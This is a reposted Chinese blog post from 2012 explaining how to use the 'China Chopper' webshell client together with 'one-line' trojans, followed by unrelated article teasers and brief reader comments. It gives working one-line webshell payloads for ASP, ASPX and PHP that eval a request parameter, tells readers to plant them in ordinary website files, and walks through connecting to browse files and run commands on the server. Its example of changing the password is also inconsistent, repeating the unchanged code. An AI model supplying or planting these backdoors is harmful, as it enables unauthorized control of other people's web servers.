当前位置:首页 > 随笔 > 正文内容

一句话与中国菜刀的用法

光的传人12年前 (2012-11-15)随笔6556

 注:本文转载,仅用来个人学习。

菜刀是用来连一句话的,asp、aspx、php的一句话菜刀都可以连,只是这几种一句话语句不一样。
asp的一句话是:<%eval request(“pass”)%>
aspx的一句话是:<%@ Page Language=”Jscript”%><%eval(Request.Item["pass"],”unsafe”);%>
php的一句话是:<?php @eval($_POST['pass']);?>
这几个一句话的密码都是pass,也就是双引号或者单引号包含着的这部分,比如我想把asp的一句话的密码改成drvfan,那么改完之后就是这样的:
<%eval request(“pass”)%>
其他同理。
要想连一句话,你首先得把这个一句话插入到一个正常的网站文件中,asp的一句话插入到asp文件里,aspx的一句话插入到aspx文件里,php同理。
当然,你也可以把一句话单独写在一个文件里,比如你新建了一个asp.php文件,这个asp.php文件的全部内容就只有一个一句话,也是可以的。
插入了一句话木马,下面就是连接了。
在菜刀主界面,右击,选择“添加”,
在“地址”这里填上你插入一句话的文件的地址,后边的那个小框填的是你的一句话的密码,其他的可以不用填,
填完之后单击“添加”,就可以了。
添加完毕后,你的这个一句话的shell会显示到菜刀主界面里,鼠标右击它,选择“文件管理”,就可以看到网站上的文件了
所以,使用菜刀,一定要熟练运用一句话
asp的一句话是:<%eval request(“pass”)%>
aspx的一句话是:<%@ Page Language=”Jscript”%><%eval(Request.Item["pass"],”unsafe”);%>
php的一句话是:<?php @eval($_POST['pass']);?>
在菜刀工具里还有一个功能,是“虚拟终端”,也是在右键菜单里的,这个相当于webshell中的执行DOS命令的功能
如果你的shell有权执行DOS命令,那么直接输入命令回车就可以看到结果了

扫描二维码推送至手机访问。

版权声明:本文由光的传人博客www.liu16.com发布,如需转载请注明出处。

本文链接:http://www.liu16.com/post/maicaidao.html?http://www.guduhpv120.com

标签: 黑客
分享给朋友:

相关文章

PanDownload倒下了,发文纪念一下吧!

PanDownload倒下了,发文纪念一下吧!

今天看到某群里讨论PanDownload作者被抓了,PanDownload也不能用了,就打开不经常使用的PanDownload.exe看了一下,果然,一直显示连接服务器中(可能从今往后再也连接不到服务器了)……在这次网络严打中,枪打出头鸟,...

广场舞歌舞排行榜

广场舞歌舞排行榜

最近给老妈买了一部老人手机,想下载一些广场舞曲放在手机里,不知道下载什么好,就分析了下,太老的一些革命歌曲吧,除非有特殊怀旧情结,我觉得我妈不一定会喜欢。前一阵子村里一伙伙人组团跳广场舞,听说挺火的,那就下一些广场舞去吧!一搜,我勒个去,好...

周恩来生日是哪天

周恩来生日是哪天

周恩来生日是哪天?一打开微信就发现有人发这个“原来今天全国都在下雨是有原因的!”怪不得今天全国都在下雨……有多少人知道 ,今天是一个人的生日,花0.5kb的流量为他转一下吧, 今天是敬爱的共和国第—任总理 周恩来的生日!...

爱心接力,好人有好报,几个是真的?

爱心接力,好人有好报,几个是真的?

今天又有一条诈骗信息在QQ群里疯传!“帮忙转发一下,一位叫徐敬的女孩,21岁,请速回雅安水城县人民医院,妈妈伤的很严重,想见她最后一面,爸爸号码:15193383486,爱心接力,好人有好报。”看到这样的信息,你觉得回是真的么?你是不是不假...

国庆节快乐!中秋节快乐!

国庆节快乐!中秋节快乐!

好久没更新博客,更新一下庆祝国庆节、中秋节!祝各位网友双节快乐!2017年国庆节放假安排: 2017年10月1日至10月8日放假,共8天。与中秋节连休。   10月1日(星期日)、10月2日(星期一)、10月3日(星期二)为国庆节法定节假日...

美得令人窒息的唐诗,鉴赏及下载

美得令人窒息的唐诗,鉴赏及下载

本来,“美得令人窒息的唐诗”是形容唐诗的美妙,却不曾想被人用来直接当作了书名!书中从唐诗三百首中精选了一部分,就成了《美得令人窒息的唐诗》一书。虽然这本书对所选的唐诗进行了注讲、解释,但是我还是觉得原汁原味的唐诗美得让人窒息!古话说的好:熟...

评论列表

空气源
11年前 (2013-04-07)

php的不懂呀!路过支持一下呗

健康使者
12年前 (2012-12-20)

学习了

女装报告
12年前 (2012-12-11)

这是要教我们啥呀?

智能电网
12年前 (2012-12-06)

鸭梨山大,楼主这篇藐似没看懂

长安婚纱摄影
12年前 (2012-11-30)

鸭梨,太有才了!

南阳金巴黎婚纱摄影
12年前 (2012-11-24)

好,顶

奶茶
12年前 (2012-11-22)

菜刀不但是用来切菜还可以做其他很多东西。。。

wordpress博客主机
12年前 (2012-11-21)

学习了

霍致永博客
12年前 (2012-11-20)

这个标题太震撼啦哈哈欢迎来访

快播电影
12年前 (2012-11-20)

看不懂 PHP了,吐血了

李志红博客
12年前 (2012-11-19)

不是很懂,只来看看。

男装
12年前 (2012-11-19)

看了半天,因为不懂,所以还是没有看懂

比分直播
12年前 (2012-11-16)

来学习了,谢谢分享

润初颜
12年前 (2012-11-16)

php的不懂呀!路过支持一下

发表评论

访客

看不清,换一张

◎欢迎参与讨论,请在这里发表您的看法和观点。